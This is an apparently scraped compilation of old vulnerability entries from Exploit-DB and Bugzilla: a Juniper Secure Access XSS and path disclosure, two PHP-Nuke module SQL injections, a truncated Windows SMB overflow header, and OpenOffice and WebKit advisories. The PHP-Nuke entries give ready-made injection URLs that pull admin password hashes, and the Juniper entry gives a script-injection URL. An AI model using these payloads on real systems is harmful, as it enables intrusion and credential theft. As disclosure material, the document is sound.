exploitdb·2008-02-28
CVE-2008-1180 Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross-Site Scripting
Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/28034/info
Juniper Networks Secure Access 2000 is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Juniper Networks Secure Access 2000 5.5R1 Build 11711 is vulnerable; other versions may also be affected.
https://www.example.com/dana-na/auth/rdremediate.cgi?delivery_mode=alert('Can%20Cross%20Site%20Attack')&action=tryagain&signinId=url_default
COMPLETE HTTP REQUEST:
Exploit-DB
Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure
exploitdb·2008-02-28
CVE-2008-1181 Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure
Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure
---
source: https://www.securityfocus.com/bid/28037/info
Juniper Networks Secure Access 2000 is prone to a path-disclosure vulnerability.
Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks.
Secure Access 2000 5.5R1 Build 11711 is vulnerable; other versions may also be affected.
https://www.example.com/dana-na/auth/remediate.cgi?action=&step=preauth
https://www.example.com/dana-na/auth/remediate.cgi?step=preauth
Exploit-DB
PHP-Nuke Module NukeC 2.1 - 'id_catg' SQL Injection
exploitdb·2008-02-21
CVE-2008-0934 PHP-Nuke Module NukeC 2.1 - 'id_catg' SQL Injection
PHP-Nuke Module NukeC 2.1 - 'id_catg' SQL Injection
---
=-==-==-==-==-==-==-==D==A==M==A==R==-==-==-==-==-==-==-==-==-==-==-=
PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection
###################################################################################
Found: DamaR
contact: [email protected]
Hack Bitti ama Dönmek Yakın Since 2000
için yaklaşık 9.080 sonuçtan 1 - 10 arası sonuçlar (0,17 saniye)
###################################################################################
Exploit:
/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2
###################################################################################
Module Copyright © Information
NukeC module for PHP-Nuke
Exploit-DB
PHP-Nuke Module Docum - 'artid' SQL Injection
exploitdb·2008-02-20
CVE-2008-0906 PHP-Nuke Module Docum - 'artid' SQL Injection
PHP-Nuke Module Docum - 'artid' SQL Injection
---
#########################################################################
php-nuke modules Docum remote sql inj
#########################################################################
Found:DamaR
[email protected]
Hack Bitti ama Dönmek Yakın Since 2000
/modules.php?name=Docum&op=viewarticle&artid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2
#########################################################################
Example: http://www.xxx.com.ar/mt/
#########################################################################
# milw0rm.com [2008-02-20]
Exploit-DB
Microsoft Windows 2000/XP - SMB Authentication Remote Overflow
exploitdb·2003-04-25
CVE-2008-4037 Microsoft Windows 2000/XP - SMB Authentication Remote Overflow
Microsoft Windows 2000/XP - SMB Authentication Remote Overflow
---
##########################################
# Exploit for "Authentication flaw in Windows SMB protocol" #
##########################################
# Release Date:
# April 24, 2003
#
# Code by Haamed Gheibi ([email protected])
# Salman Niksefat ([email protected])
#
# Systems Affected by this exploit:
# Windows 2000 (SP0 SP1 SP2 SP3)
# Windows XP (SP0 SP1)
#
# EXPLOIT PROVIDED FOR EDUCATIONAL PURPOSES ONLY AS A PROOF OF CONCEPT
# WE TAKE NO RESPONSIBILITY FOR USE OF THIS CODE.
##########################################
This exploit is based on samba-2.2.8a, you can download the source code from:
http://us1.samba.org/samba/ftp/samba-2.2.8a.tar.bz2
or other mirrors.
First you should configure and make samb
Bugzilla
CVE-2009-0259 openoffice.org: text converter memory corruption via a crafted (1) .doc, (2) .wri, or (3) .rtf Word97 file
bugzilla·2008-12-10·CVSS 9.3
CVE-2009-0259 [CRITICAL] CVE-2009-0259 openoffice.org: text converter memory corruption via a crafted (1) .doc, (2) .wri, or (3) .rtf Word97 file
CVE-2009-0259 openoffice.org: text converter memory corruption via a crafted (1) .doc, (2) .wri, or (3) .rtf Word97 file
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-4841 to
the following vulnerability:
The WordPad Text Converter for Word 97 files in Microsoft Windows 2000
SP4, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to
execute arbitrary code via a crafted (1) .doc, (2) .wri, or (3) .rtf
Word 97 file that triggers memory corruption, as exploited in the wild
in December 2008. NOTE: As of 20081210, it is unclear whether this
vulnerability is related to a WordPad issue disclosed on 20080925 with
a 2008-crash.doc.rar example, but there are insufficient details to be
sure.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4841
http
Bugzilla
CVE-2008-2000 WebKit: DoS via JavaScript that calls document.write in an infinite loop
bugzilla·2008-05-06·CVSS 4.3
CVE-2008-2000 [MEDIUM] CVE-2008-2000 WebKit: DoS via JavaScript that calls document.write in an infinite loop
CVE-2008-2000 WebKit: DoS via JavaScript that calls document.write in an infinite loop
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-2000 to the following vulnerability:
Unspecified vulnerability in Apple Safari 3.1.1 allows remote attackers to cause a denial of service (application crash) via JavaScript code that calls document.write in an infinite loop.
Refences:
http://www.securityfocus.com/archive/1/archive/1/491192/100/0/threaded
http://es.geocities.com/jplopezy/pruebasafari3.html
http://www.frsirt.com/english/advisories/2008/1347
http://xforce.iss.net/xforce/xfdb/41985
Discussion:
This seems to be WebKit issue, not specific to Safari. Malicious JavaScript can
cause huge memory and CPU resources consumption, leading to a browser crash.
We do not treat this
http://es.geocities.com/jplopezy/pruebasafari3.htmlhttp://securityreason.com/securityalert/3833http://www.securityfocus.com/archive/1/491192/100/0/threadedhttp://www.vupen.com/english/advisories/2008/1347https://exchange.xforce.ibmcloud.com/vulnerabilities/41985http://es.geocities.com/jplopezy/pruebasafari3.htmlhttp://securityreason.com/securityalert/3833http://www.securityfocus.com/archive/1/491192/100/0/threadedhttp://www.vupen.com/english/advisories/2008/1347https://exchange.xforce.ibmcloud.com/vulnerabilities/41985
2008-04-28
Published